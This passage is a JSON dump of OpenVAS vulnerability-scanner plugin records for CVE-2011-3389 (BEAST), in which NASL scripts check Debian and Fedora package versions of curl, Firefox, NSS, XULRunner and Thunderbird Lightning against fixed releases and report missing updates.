"cvss3": {}, "published": "2012-04-30T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2398-2 (curl)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:136141256231071249", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231071249", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2398_2.nasl 14275 2019-03-18 14:39:45Z cfischer $\n# Description: Auto-generated from advisory DSA 2398-2 (curl)\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.71249\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_cve_id(\"CVE-2011-3389\");\n script_version(\"$Revision: 14275 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:39:45 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-30 07:55:40 -0400 (Mon, 30 Apr 2012)\");\n script_name(\"Debian Security Advisory DSA 2398-2 (curl)\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_xref(name:\"URL\", value:\"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%202398-2\");\n script_tag(name:\"insight\", value:\"cURL is a command-line tool and library for transferring data with URL\nsyntax. It was discovered that the countermeasures against the\nDai/Rogaway chosen-plaintext attack on SSL/TLS (CVE-2011-3389,\nBEAST) cause interoperability issues with some server\nimplementations. This update ads the the CURLOPT_SSL_OPTIONS and\nCURLSSLOPT_ALLOW_BEAST options to the library, and the\n\n - --ssl-allow-beast option to the curl program.\n\nFor the stable distribution (squeeze), this problem has been fixed in\nversion 7.21.0-2.1+squeeze2.\");\n\n script_tag(name:\"solution\", value:\"We recommend that you upgrade your curl packages.\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update to curl\nannounced via advisory DSA 2398-2.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"curl\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-dbg\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl3-gnutls\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-gnutls-dev\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"libcurl4-openssl-dev\", ver:\"7.21.0-2.1+squeeze2\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99);\n}", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-02T10:56:45", "description": "Check for the Version of xulrunner", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for xulrunner FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2017-12-28T00:00:00", "id": "OPENVAS:863960", "href": "http://plugins.openvas.org/nasl.php?oid=863960", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for xulrunner FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"xulrunner on Fedora 16\";\ntag_insight = \"XULRunner is a Mozilla runtime package that can be used to bootstrap XUL+XPCOM\n applications that are as rich as Firefox and Thunderbird. It provides mechanisms\n for installing, upgrading, and uninstalling these applications. XULRunner also\n provides libxul, a solution which allows the embedding of Mozilla technologies\n in other projects and products.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071326.html\");\n script_id(863960);\n script_version(\"$Revision: 8253 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-28 07:29:51 +0100 (Thu, 28 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 12:38:35 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for xulrunner FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of xulrunner\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~9.0~2.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-03T10:58:33", "description": "Check for the Version of nss-softokn", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nss-softokn FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-03T00:00:00", "id": "OPENVAS:863692", "href": "http://plugins.openvas.org/nasl.php?oid=863692", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-softokn FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss-softokn on Fedora 15\";\ntag_insight = \"Network Security Services Softoken Cryptographic Module\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072230.html\");\n script_id(863692);\n script_version(\"$Revision: 8273 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-03 07:29:19 +0100 (Wed, 03 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:36 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for nss-softokn FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss-softokn\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-softokn\", rpm:\"nss-softokn~3.13.1~15.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2019-05-29T18:38:46", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for firefox FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310864070", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310864070", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071322.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.864070\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:06:55 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name:\"FEDORA\", value:\"2011-17400\");\n script_name(\"Fedora Update for firefox FEDORA-2011-17400\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'firefox'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC16\");\n script_tag(name:\"affected\", value:\"firefox on Fedora 16\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~9.0~3.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2018-01-06T13:06:49", "description": "Check for the Version of firefox", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for firefox FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-05T00:00:00", "id": "OPENVAS:864070", "href": "http://plugins.openvas.org/nasl.php?oid=864070", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"firefox on Fedora 16\";\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\n compliance, performance and portability.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071322.html\");\n script_id(864070);\n script_version(\"$Revision: 8295 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-05 07:29:18 +0100 (Fri, 05 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:06:55 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for firefox FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~9.0~3.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-11T11:07:35", "description": "Check for the Version of thunderbird-lightning", "cvss3": {}, "published": "2012-04-02T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird-lightning FEDORA-2011-17400", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-09T00:00:00", "id": "OPENVAS:864037", "href": "http://plugins.openvas.org/nasl.php?oid=864037", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird-lightning FEDORA-2011-17400\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"thunderbird-lightning on Fedora 16\";\ntag_insight = \"Lightning brings the Sunbird calendar to the popular email client,\n Mozilla Thunderbird. Since it's an extension, Lightning is tightly\n integrated with Thunderbird, allowing it to easily perform email-related\n calendaring tasks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2011-December/071321.html\");\n script_id(864037);\n script_version(\"$Revision: 8336 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-09 08:01:48 +0100 (Tue, 09 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-04-02 13:04:19 +0530 (Mon, 02 Apr 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17400\");\n script_name(\"Fedora Update for thunderbird-lightning FEDORA-2011-17400\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of thunderbird-lightning\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC16\")\n{\n\n if ((res = isrpmvuln(pkg:\"thunderbird-lightning\", rpm:\"thunderbird-lightning~1.1~0.1.rc1.fc16\", rls:\"FC16\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:58:28", "description": "Check for the Version of nss-util", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for nss-util FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2017-12-29T00:00:00", "id": "OPENVAS:863691", "href": "http://plugins.openvas.org/nasl.php?oid=863691", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for nss-util FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"nss-util on Fedora 15\";\ntag_insight = \"Utilities for Network Security Services and the Softoken module\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072222.html\");\n script_id(863691);\n script_version(\"$Revision: 8257 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-12-29 07:29:46 +0100 (Fri, 29 Dec 2017) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:34 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for nss-util FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of nss-util\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"nss-util\", rpm:\"nss-util~3.13.1~3.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-08T12:56:31", "description": "Check for the Version of firefox", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for firefox FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2018-01-08T00:00:00", "id": "OPENVAS:863696", "href": "http://plugins.openvas.org/nasl.php?oid=863696", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for firefox FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"firefox on Fedora 15\";\ntag_insight = \"Mozilla Firefox is an open-source web browser, designed for standards\n compliance, performance and portability.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072224.html\");\n script_id(863696);\n script_version(\"$Revision: 8313 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-01-08 08:02:11 +0100 (Mon, 08 Jan 2018) $\");\n script_tag(name:\"creation_date\", value:\"2012-01-23 11:30:48 +0530 (Mon, 23 Jan 2012)\");\n script_cve_id(\"CVE-2011-3389\");\n script_tag(name:\"cvss_base\", value:\"4.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:N/A:N\");\n script_xref(name: \"FEDORA\", value: \"2011-17399\");\n script_name(\"Fedora Update for firefox FEDORA-2011-17399\");\n\n script_tag(name: \"summary\" , value: \"Check for the Version of firefox\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2012 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC15\")\n{\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~9.0.1~1.fc15\", rls:\"FC15\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-01-02T10:57:30", "description": "Check for the Version of thunderbird-lightning", "cvss3": {}, "published": "2012-01-23T00:00:00", "type": "openvas", "title": "Fedora Update for thunderbird-lightning FEDORA-2011-17399", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2011-3389"], "modified": "2017-12-26T00:00:00", "id": "OPENVAS:863699", "href": "http://plugins.openvas.org/nasl.php?oid=863699", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for thunderbird-lightning FEDORA-2011-17399\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"thunderbird-lightning on Fedora 15\";\ntag_insight = \"Lightning brings the Sunbird calendar to the popular email client,\n Mozilla Thunderbird. Since it's an extension, Lightning is tightly\n integrated with Thunderbird, allowing it to easily perform email-related\n calendaring tasks.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"http://lists.fedoraproject.org/pipermail/package-announce/2012-January/072223.html\");\n script_id(863699);\n script_version(\"$Revision: 